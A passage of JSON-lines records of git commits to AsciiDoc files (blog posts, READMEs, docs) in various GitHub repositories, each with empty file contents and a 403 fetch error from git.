documentation.\n","repos":"Stranger6667\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81e66d3bc91b79d42b51c369ab86416fcd21954c","subject":"Update 2015-09-18-HSBCs-Revolution-Programme.adoc","message":"Update 2015-09-18-HSBCs-Revolution-Programme.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-HSBCs-Revolution-Programme.adoc","new_file":"_posts\/2015-09-18-HSBCs-Revolution-Programme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a984da7b1d6df944dd15c993bb83c3c678e7b661","subject":"Update 2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","message":"Update 2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","new_file":"_posts\/2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c48283e034adb89737ef6d2545d819e6df96a690","subject":"new lab 2","message":"new lab 2\n","repos":"dm-academy\/aitm-labs,dm-academy\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-02\/02-tech-lab-v2.adoc","new_file":"Lab-02\/02-tech-lab-v2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dm-academy\/aitm-labs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c8c37c1e6e277e0179e45996c4db87c2a6b017f","subject":"Fixed minor typo in docs","message":"Fixed minor typo in docs\n\nopip > pip","repos":"Stranger6667\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb5a8be8f900a5acb6f99cee59144b82695ea1aa","subject":"Update 2016-11-10-Angulartics-rewrite-with-Angular-2-support.adoc","message":"Update 
2016-11-10-Angulartics-rewrite-with-Angular-2-support.adoc","repos":"timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io","old_file":"_posts\/2016-11-10-Angulartics-rewrite-with-Angular-2-support.adoc","new_file":"_posts\/2016-11-10-Angulartics-rewrite-with-Angular-2-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timelf123\/timelf123.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f8bf15e00d4dc061562ffc58efdf87366f67e7a","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"460bf7a04cc517a9523a571dc53a911a85a65ab8","subject":"Delete 2015-10-01-Neu.adoc","message":"Delete 2015-10-01-Neu.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-10-01-Neu.adoc","new_file":"_posts\/2015-10-01-Neu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0718a2f5462e6ebfb742d9a562d0468bc4134e2e","subject":"Update 2018-10-15-Firebase-Firestore.adoc","message":"Update 2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"895d2b0a500e0f86c6ed15468ef420d2d73f8d6d","subject":"adding release notes for BVal-1.1.0","message":"adding release notes for BVal-1.1.0\n\n","repos":"dblevins\/bval,apache\/bval","old_file":"RELEASE-NOTES.adoc","new_file":"RELEASE-NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dblevins\/bval.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec09e4b56e08876ae7667839ce6efbe2333c97c2","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af35e320becfeae19734ba4b491b35ac1d848a67","subject":"Corrected path","message":"Corrected path\n\nAdded helloworld to path in cd to docker-java-sample","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"java\/chapters\/ch03-build-image.adoc","new_file":"java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87627034c46f72c5435835d2f2d8197bc7f2d72c","subject":"draft version of AWS china article","message":"draft version of AWS china article\n","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-8-20-AWS-China.adoc","new_file":"_posts\/2015-8-20-AWS-China.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2365fafb682c4183061501aa04167fff56bdaab","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a9dd8877ed31c4fa2965a0851618cc1700dd61e","subject":"addr-osmify-py: add a readme","message":"addr-osmify-py: add a readme\n","repos":"vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam","old_file":"osm\/addr-osmify-py\/README.adoc","new_file":"osm\/addr-osmify-py\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vmiklos\/vmexam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55723fc2a9711f19a493ade3ba3f29406b4a93ef","subject":"CNV-11965 for defect 1959287 CPU vendors","message":"CNV-11965 for defect 1959287 CPU vendors\n\nCNV-11965 for defect 1959287 CPU vendors\n\nCNV-11965 for defect 1959287 CPU vendors\n\nCNV-11965 for defect 1959287 CPU vendors\n\nCNV-11965 for defect 1959287\n\nSME\/QE review\n\nedit\n\nsme review\n\nsme review edit\n\npeer review\n\nedit for bullet\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"virt\/install\/preparing-cluster-for-virt.adoc","new_file":"virt\/install\/preparing-cluster-for-virt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12e9d6382e01b54c98a537883312a251ee73b33e","subject":"Update 2016-02-18-XML-Prague-2016-Review.adoc","message":"Update 
2016-02-18-XML-Prague-2016-Review.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-XML-Prague-2016-Review.adoc","new_file":"_posts\/2016-02-18-XML-Prague-2016-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1640b5aa2a337e114a2c875027aab533e6cb27d9","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1227c8e88c39cfc3688be643e76ff0146661c9c6","subject":"Update 2018-06-24-Laravel.adoc","message":"Update 2018-06-24-Laravel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel.adoc","new_file":"_posts\/2018-06-24-Laravel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaf222102d6b4be8340dff319674c2687be1c12b","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3811b7622c286511491d303141df6646ff4ddb5","subject":"Started the ide setup doc with instructions for vscode (#87)","message":"Started the ide setup doc with instructions for vscode (#87)\n\n* started the ide setup doc for vscode\r\n\r\nSigned-off-by: Shoubhik <4640c91dc0094b6cebec7c1a9ac3df9bcd448798@dhcp35-156.lab.eng.blr.redhat.com>\r\n\r\nIDE Setup doc started with fixed filename\r\n\r\nSigned-off-by: Shoubhik <4640c91dc0094b6cebec7c1a9ac3df9bcd448798@dhcp35-156.lab.eng.blr.redhat.com>\r\n\r\n* Improve vscode instructions\r\n\r\n* Add link to plugin readme\r\n","repos":"ldimaggi\/almighty-core,ldimaggi\/almighty-core,ldimaggi\/almighty-core,ldimaggi\/almighty-core,ALMighty\/almighty-core","old_file":"docs\/development\/ide-setup.adoc","new_file":"docs\/development\/ide-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ldimaggi\/almighty-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78feb330095d83f9dbbb566159573f63c38fd94b","subject":"KUDU-1733. Update consistency semantics doc","message":"KUDU-1733. 
Update consistency semantics doc\n\nChange-Id: I5a59315e70531c8904470c026030f4cc2107ca5b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5605\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\n","repos":"cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu","old_file":"docs\/transaction_semantics.adoc","new_file":"docs\/transaction_semantics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"370c5e4ef4bde073367a4806f63d047233105835","subject":"Update 2014-01-04-1-an-a-Lateral-Thoughts.adoc","message":"Update 2014-01-04-1-an-a-Lateral-Thoughts.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2014-01-04-1-an-a-Lateral-Thoughts.adoc","new_file":"_posts\/2014-01-04-1-an-a-Lateral-Thoughts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64f76d8e1e6857e2e2663a1b74d2c4de3ce6699d","subject":"Update 2016-08-24-Faster-acceptance-tests.adoc","message":"Update 2016-08-24-Faster-acceptance-tests.adoc","repos":"ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog","old_file":"_posts\/2016-08-24-Faster-acceptance-tests.adoc","new_file":"_posts\/2016-08-24-Faster-acceptance-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciena-blueplanet\/developers.blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"958fab1a97c290e13b5ae4671c3607a184b2a977","subject":"Update 2017-02-07-Managing-docker-compose.adoc","message":"Update 2017-02-07-Managing-docker-compose.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Managing-docker-compose.adoc","new_file":"_posts\/2017-02-07-Managing-docker-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3af365aab6c50aea234ec7a66ad15c700b1c941d","subject":"Style change","message":"Style 
change\n","repos":"lafent\/grunt-and-done","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lafent\/grunt-and-done.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29adf0b074859996775ad15bebf8391f9ef6a12f","subject":"Change status badge to 'shield'","message":"Change status badge to 'shield'\n","repos":"tlocke\/pg8000","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tlocke\/pg8000.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fd976ff3648859e47d2a6a566b9787bc8443f396","subject":"Gradle plugin in README","message":"Gradle plugin in README\n","repos":"cthiebaud\/jaxrs-analyzer,sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"827f30c1111560baa147cb0941e539ac4aa408a4","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"589bc22c3906e757f88bdf6462c637d48256cd07","subject":"Update 2019-11-21-CREATE-NEW-POST-ON-2311-oyl.adoc","message":"Update 2019-11-21-CREATE-NEW-POST-ON-2311-oyl.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-21-CREATE-NEW-POST-ON-2311-oyl.adoc","new_file":"_posts\/2019-11-21-CREATE-NEW-POST-ON-2311-oyl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"866f95859c55d02431c49ae4b7ae194df15d8001","subject":"Adding 1.8 Beta1 release announcement","message":"Adding 1.8 Beta1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-11-30-debezium-1.8-beta1-released.adoc","new_file":"_posts\/2021-11-30-debezium-1.8-beta1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"13f7d41e989bc97993e7fd80e8e21744450cfac9","subject":"1.2.1.Final release announcement","message":"1.2.1.Final release 
announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-07-16-debezium-1-2-1-final-released.adoc","new_file":"blog\/2020-07-16-debezium-1-2-1-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78d34dc16a12e9643b521899459f13e9d8cd89d1","subject":"y2b create post The iPhone 4 \\\/ 4S Metallic","message":"y2b create post The iPhone 4 \\\/ 4S Metallic","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-29-The-iPhone-4--4S-Metallic.adoc","new_file":"_posts\/2011-10-29-The-iPhone-4--4S-Metallic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf09267df94f4984a283b1bc6f9e457d8f3bd542","subject":"new form for fud-5","message":"new form for fud-5\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5.adoc","new_file":"_posts\/2017-09-01-fud5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d90733bd0cf8b41c64956f4bc1866fc1d52e2ae","subject":"Update 2017-01-18-I-wonder.adoc","message":"Update 2017-01-18-I-wonder.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-01-18-I-wonder.adoc","new_file":"_posts\/2017-01-18-I-wonder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19fe69217626ceeee9cf44df94aeae089cc7787c","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef4efff830e2c2c5ad82e34d7f64dca6c6e88942","subject":"y2b create post iPhone Is The Most Successful Product Ever","message":"y2b create post iPhone Is The Most Successful Product Ever","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-30-iPhone-Is-The-Most-Successful-Product-Ever.adoc","new_file":"_posts\/2017-09-30-iPhone-Is-The-Most-Successful-Product-Ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dcd4fdc3ec4aaa2a6e245da4b861ff59ddfc712","subject":"Hawkular Metrics - Roadmap 2016","message":"Hawkular Metrics - Roadmap 2016\n","repos":"jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/03\/16\/hawkular-metrics-roadmap.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/03\/16\/hawkular-metrics-roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b69d50241005058fd298338df3aa319e77253968","subject":"Update 2019-03-21-Using-Docker-Container.adoc","message":"Update 2019-03-21-Using-Docker-Container.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2019-03-21-Using-Docker-Container.adoc","new_file":"_posts\/2019-03-21-Using-Docker-Container.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae724d4c49a70015fd1cc12255bc47752df0cac6","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d57f82611bceaf0d2b1cb29ceb2f834ef7675368","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c30871db2417bcd4dd20062f92101bbd5ee4004","subject":"Update 
2016-07-22-Presentations.adoc","message":"Update 2016-07-22-Presentations.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-22-Presentations.adoc","new_file":"_posts\/2016-07-22-Presentations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45ec5bc153c71f0277302f36ec1405d95079684c","subject":"First proposition draft for functional fundations of Reactivity.","message":"First proposition draft for functional fundations of Reactivity.\n","repos":"reactivity-io\/reactivity-doc","old_file":"functional-fundations.adoc","new_file":"functional-fundations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reactivity-io\/reactivity-doc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d11053928163f21f39c1b35ab45070c2380cdf5b","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 